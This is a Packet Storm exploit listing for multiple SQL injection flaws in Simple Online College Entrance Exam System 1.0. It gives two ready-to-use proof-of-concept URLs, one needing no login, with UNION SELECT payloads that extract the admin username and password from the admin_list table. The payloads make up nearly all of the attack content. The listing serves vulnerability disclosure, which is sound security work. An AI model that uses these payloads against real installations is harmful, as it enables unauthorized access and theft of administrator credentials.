Simple Online College Entrance Exam System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Mevlut Yilmaz in October of 2021.
c34a7fec377c4faae30e854c1ea2bf06f96331b03c0fffcf07d8a3145a9a8d01# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Multiple SQL injections
The following PoCs will leak the admin username and password:
Unauthenticated:
http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;
Admin:
http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed